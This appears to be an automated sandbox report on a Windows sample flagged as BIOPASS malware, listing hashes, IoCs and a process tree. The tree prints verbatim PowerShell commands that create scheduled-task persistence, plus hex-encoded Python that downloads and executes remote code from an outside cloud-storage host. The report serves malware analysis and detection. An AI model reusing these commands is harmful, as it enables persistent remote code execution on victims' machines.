Analysis
-
max time kernel
23s -
max time network
26s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
12-07-2021 07:12
Static task
static1
Behavioral task
behavioral1
Sample
30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe
Resource
win10v20210408
0 signatures
0 seconds
General
-
Target
30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe
-
Size
4.8MB
-
MD5
0c858bb12c5eeb59a7add281fc6045be
-
SHA1
6517cc3d9ad5a6ffc82fce8097070684fa6a6282
-
SHA256
30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe
-
SHA512
096055c770e6f1e1fc1e2993fa565f17cf23b6aa67180662f95aab2adf034cc23baf687c57da74a9a8f85f27883b3f27a6d6edf02a49881b552ad858c3b7f2b6
Malware Config
Signatures
-
family_biopass 1 IoCs
yara_rule family_biopass -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 1588 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe -
Loads dropped DLL 64 IoCs
pid Process 668 taskeng.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1588 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe 1964 ServiceHub.Host.CLR.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 5 Go-http-client/1.1 HTTP User-Agent header 6 Go-http-client/1.1 -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1996 ping.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 324 powershell.exe 324 powershell.exe 1052 powershell.exe 1052 powershell.exe 2036 powershell.exe 2036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: 35 1588 ServiceHub.Host.CLR.exe Token: SeDebugPrivilege 2036 powershell.exe Token: 35 1964 ServiceHub.Host.CLR.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1096 wrote to memory of 1996 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 25 PID 1096 wrote to memory of 1996 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 25 PID 1096 wrote to memory of 1996 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 25 PID 1096 wrote to memory of 512 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 31 PID 1096 wrote to memory of 512 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 31 PID 1096 wrote to memory of 512 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 31 PID 512 wrote to memory of 324 512 cmd.exe 33 PID 512 wrote to memory of 324 512 cmd.exe 33 PID 512 wrote to memory of 324 512 cmd.exe 33 PID 512 wrote to memory of 272 512 cmd.exe 34 PID 512 wrote to memory of 272 512 cmd.exe 34 PID 512 wrote to memory of 272 512 cmd.exe 34 PID 1096 wrote to memory of 800 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 36 PID 1096 wrote to memory of 800 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 36 PID 1096 wrote to memory of 800 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 36 PID 800 wrote to memory of 1052 800 cmd.exe 38 PID 800 wrote to memory of 1052 800 cmd.exe 38 PID 800 wrote to memory of 1052 800 cmd.exe 38 PID 668 wrote to memory of 1588 668 taskeng.exe 39 PID 668 wrote to memory of 1588 668 taskeng.exe 39 PID 668 wrote to memory of 1588 668 taskeng.exe 39 PID 800 wrote to memory of 1352 800 cmd.exe 40 PID 800 wrote to memory of 1352 800 cmd.exe 40 PID 800 wrote to memory of 1352 800 cmd.exe 40 PID 800 wrote to memory of 592 800 cmd.exe 41 PID 800 wrote to memory of 592 800 cmd.exe 41 PID 800 wrote to memory of 592 800 cmd.exe 41 PID 1096 wrote to memory of 856 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 42 PID 1096 wrote to memory of 856 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 42 PID 1096 wrote to memory of 856 1096 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe 42 PID 856 wrote to memory of 2036 856 cmd.exe 44 PID 856 wrote to memory of 2036 856 cmd.exe 44 PID 856 wrote to memory of 2036 856 cmd.exe 44 PID 856 wrote to memory of 1556 856 cmd.exe 45 PID 856 wrote to memory of 1556 856 cmd.exe 45 PID 856 wrote to memory of 1556 856 cmd.exe 45 PID 668 wrote to memory of 1964 668 taskeng.exe 46 PID 668 wrote to memory of 1964 668 taskeng.exe 46 PID 668 wrote to memory of 1964 668 taskeng.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe"C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\ping.exeping www.baidu.com2⤵
- Runs ping.exe
PID:1996
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"2⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_SETTINGS3⤵PID:272
-
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "2⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_TEST3⤵PID:1352
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /DELETE /F /TN SYSTEM_TEST3⤵PID:592
-
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_CDAEMON3⤵PID:1556
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E0BF4FFA-5CCF-4C2C-A680-9060AC7B40A1} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exeC:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929').decode())" a a2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exeC:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929').decode())" a a2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1964
-